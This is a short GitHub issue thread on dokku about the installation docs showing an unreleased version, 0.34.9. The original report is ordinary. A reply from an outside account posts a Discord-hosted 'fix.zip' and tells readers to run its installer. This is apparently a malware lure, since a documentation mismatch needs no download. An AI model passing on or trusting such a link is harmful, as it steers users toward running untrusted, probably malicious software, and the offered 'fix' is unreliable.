### ISSUE TITLE
The current version (0.34.9 )of the documentation has not been released yet

### ISSUE THREAD

**Issue by stefsava** [dokku/dokku#7105]
### Link to the documentation page

https://dokku.com/docs/getting-started/installation/

### Documentation problem

The current version (0.34.9 )of the documentation has not been released yet.

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
